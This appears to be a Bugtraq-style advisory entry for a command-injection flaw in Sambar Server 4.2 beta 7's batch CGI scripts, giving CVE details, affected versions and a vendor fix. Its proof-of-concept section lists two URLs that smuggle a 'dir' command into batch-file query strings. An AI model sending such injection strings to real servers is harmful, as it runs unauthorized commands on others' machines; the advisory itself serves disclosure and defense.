Sambar Server Batch CGI Vulnerability
BID:1002
Info
Sambar Server Batch CGI Vulnerability
| Bugtraq ID: | 1002 |
| Class: | Input Validation Error |
| CVE: |
CVE-2000-0213 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 24 2000 12:00AM |
| Updated: | Jul 11 2009 01:56AM |
| Credit: | Posted to Bugtraq on February 23, 2000 by Georich Chorbadzhiyski <[email protected]> and Nikolay Tsvetkov. |
| Vulnerable: |
Sambar Server 4.2 beta 7 |
| Not Vulnerable: |
Sambar Server 4.2 beta 8 |
Exploit / POC
Sambar Server Batch CGI Vulnerability
The following examples were provided:
http://target/cgi-bin/hello.bat?&dir+c:or
http://target/cgi-bin/echo.bat?&dir+c:\
The following examples were provided:
http://target/cgi-bin/hello.bat?&dir+c:or
http://target/cgi-bin/echo.bat?&dir+c:\
Solution / Fix
Sambar Server Batch CGI Vulnerability
Solution:
Sambar Technologies has made available a version of Sambar Server that does not ship with any batch files. However, since batch-file execution is still supported, attackers can still compromise a computer if batch files are uploaded to the 'cgi-bin' directory by any means.
This version (4.3 Beta 8) without batch files may be downloaded from the location below:
http://www.sambar.com/beta.htm
Solution:
Sambar Technologies has made available a version of Sambar Server that does not ship with any batch files. However, since batch-file execution is still supported, attackers can still compromise a computer if batch files are uploaded to the 'cgi-bin' directory by any means.
This version (4.3 Beta 8) without batch files may be downloaded from the location below:
http://www.sambar.com/beta.htm